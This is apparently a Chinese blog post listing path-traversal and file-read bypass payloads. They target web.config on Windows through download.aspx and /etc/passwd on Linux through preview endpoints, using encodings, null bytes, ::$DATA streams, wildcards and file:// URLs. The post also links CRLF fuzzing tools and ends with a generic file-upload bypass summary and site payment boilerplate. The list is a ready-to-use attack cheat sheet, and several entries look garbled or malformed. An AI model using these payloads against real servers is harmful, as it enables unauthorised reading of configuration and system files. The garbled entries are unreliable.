文件读取漏洞绕过

一:windows

默认:

download.aspx?file=haohaoxuexi.doc

download.aspx?file=../web.config

突破文件名:

思路1:download.aspx?file=../web.config::$DATA    //数据流

思路2:download.aspx?file=../web.config::$DATA 空格  //数据流+空格

思路3:download.aspx?file=../web.config空格  //空格

思路4:download.aspx?file=../web.config.    //加点

思路5:download.aspx?file=../web.coNfig   //大小写

思路6:download.aspx?file=C://wwwroot/web/web.config  // 网站物理路径、

思路7:download.aspx?file=../web.config\  //反斜杆 

突破../  :

思路1:download.aspx?file=..%2Fweb.config   // url编码

思路2:download.aspx?file=..%252Fweb.config  //uncode编码

思路3:download.aspx?file=.....///web.config    

思路4:download.aspx?file=....//....//web.config    

思路5:download.aspx?file=..&/....&/web.config 

思路6:download.aspx?file=http/.....///.....///web.config

思路7:download.aspx?file=http....web.config

思路8:download.aspx?file=…/./web.config

思路9:download.aspx?file=…/./web.config

download.aspx?file=/%2e%2e%2fweb.config
download.aspx?file=%2f%2e%2e/web.config
download.aspx?file=\%2e%2e%5cweb.config
download.aspx?file=%5c%2e%2e\web.config
download.aspx?file=/%252e%252e%252fweb.config
download.aspx?file=/%252e%252e%255cweb.config
download.aspx?file=./web.config
download.aspx?file=..\web.config

download.aspx?file=.%00./web.config

download.aspx?file=.+./.+./web.config
download.aspx?file=.;./.;./web.config
download.aspx?file=.%./.%./web.config
download.aspx?file=..%5c..%5c/web.config
download.aspx?file=..././..././/web.config
 

linux:

思路1:download.php?url=../../../etc/passwd%00

思路2:download.php?url=../../../etc/passw?

思路3:/file-preview/getCorsFile?urlPath=file:///etc/passwd

思路4:/file-preview//getCorsFile?urlPath=file:///etc/passwd  //突破限制目录

思路5:/file-preview//onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO  //base64

思路6:/file-preview//onlinePreview?url=..<details>/..<details>/..<details>etc/passwd 

.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd

思路8:/file-preview//onlinePreview?url=file:///etc/passwd#a.txt

/file-preview//onlinePreview?url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

通配符还有几种形式
星号符号(*):表示任何字符(包括空字符),可以出现0次、1次或多次。例如:ls *.txt(显示当前目录下所有以 .txt 结尾的文件)


问号符号(?):表示任意单个字符。例如:ls ?.txt(显示当前目录下所有以一个字符开头,以 .txt 结尾的文件)


中括号符号([]):表示中括号内任意一个字符。例如:ls [abc]*(显示当前目录下以 a、b、c 任意一个字母开头的所有文件)


脱字符号(^):表示取反,即除了中括号内的字符以外的任意一个字符。例如:ls [^abc]*(显示当前目录下除了以 a、b、c 任意一个字母开头的所有文件)

另外还有几个设计上的问题:
Crtl注入
几个crtl  fuzz 的工具,有兴趣的小伙伴可以自己本地fuzz,大部分waf都存在
https://github.com/dwisiswant0/crlfuzz
https://github.com/Proviesec/crlf-payloads

cat /etc/passw?
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过应用程序的安全机制,将恶意文件上传到服务器上,从而实现攻击目的。常见的文件上传漏洞绕过方式包括以下几种: 1. 修改文件类型:攻击者可以修改上传文件文件类型,将恶意文件伪装成常见文件类型,绕过检测机制。 2. 绕过文件类型检测:上传文件时,应用程序会检测文件类型,如果上传的文件类型不符合要求,则会拒绝上传。攻击者可以通过修改 HTTP 头部信息或者使用特殊字符等方式,绕过文件类型检测。 3. 绕过文件大小限制:应用程序通常会限制上传文件的大小,攻击者可以通过分割文件、压缩文件等方式,绕过文件大小限制。 4. 绕过文件路径检测:应用程序会检测上传文件的路径,如果路径不符合要求,则会拒绝上传。攻击者可以通过构造特殊的路径,绕过文件路径检测。 5. 绕过文件名检测:应用程序会检测上传文件文件名,如果文件名不符合要求,则会拒绝上传。攻击者可以通过构造特殊的文件名,绕过文件名检测。 为了避免文件上传漏洞的攻击,应用程序开发人员可以采取以下措施: 1. 对上传文件进行严格的类型、大小、路径、文件名检测,确保上传的文件符合要求。 2. 对上传文件进行病毒扫描和安全检测,确保上传的文件不包含恶意代码。 3. 限制上传文件的存储路径,确保上传的文件不会对系统造成危害。 4. 对上传文件进行权限控制,确保只有授权的用户才能访问上传的文件。 5. 定期更新应用程序和服务器的安全补丁,确保系统处于最新的安全状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值